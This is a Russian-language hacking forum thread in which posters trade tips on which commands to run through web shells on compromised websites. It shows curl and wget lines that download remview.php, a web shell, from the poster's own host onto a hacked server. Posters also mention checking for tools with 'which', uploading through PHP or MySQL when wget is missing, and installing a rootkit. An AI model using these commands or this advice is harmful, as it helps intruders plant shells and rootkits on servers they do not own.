Какие команды можно выполнять на шеллах или найденных уязвимостях ! Допустим я знаю такие команды как pwd , echo , ls -la , wget , cd ,cat.. Но это все команды для листания !! А какими командами можно сливать или заливать файлы на сайт ! Например на некоторых сайтах wget не работает а если я пишу curl -o ./remview.php http://mysite/remview.php то заливается но при попытке обрашения к нему выдает ошибку 302 : Found
The document has moved here
Ну тут нужны прямые руки а не банальное знание команд.
Например утилита wget (часто /usr/bin/wget) может скачать по http файл и положить его в папку... Например wget http://.../remview.php -o remview.php
также можно качать файлы lynx'ом (текстовой браузер, мой любимый)
и другими прогами...
/usr/bin/ps пок. список процессов... если тебе нужно поставить хороший руткит, это тоже в аську сдесь долго писать
ещё
можно использовать echo ))
проверь, какие утилиты есть в с-ме: which wget
если все ок, тебе покажут /usr/bin/wget
да. у меня похожая проблема. КЕЗ, напипши, пожалуйста как посмотреть какие ваще утилиты установленны. например про вгет и кёрл можно узнать через phpinfo()...
И еще у меня конкретный вопрос: на серваке не стоит ни вгет ни кёрл... через чё можно файло закачивать, что стоит в большинстве систем?
Я ваще с линуом немного на ВЫ, но когда было дело юзал в оснавном:
wget - заливал (если нет его, то средствами php или mysql, смотря куда есть доступ)
tar, gzip - архиваторы
cp - копирование
chmod - сменить чмод файла
mkdir - создать диру
ну и в остальном всякие типа mysqdump итп, не имеющие отношения к линю. Но чаще всего это cd, cat, ls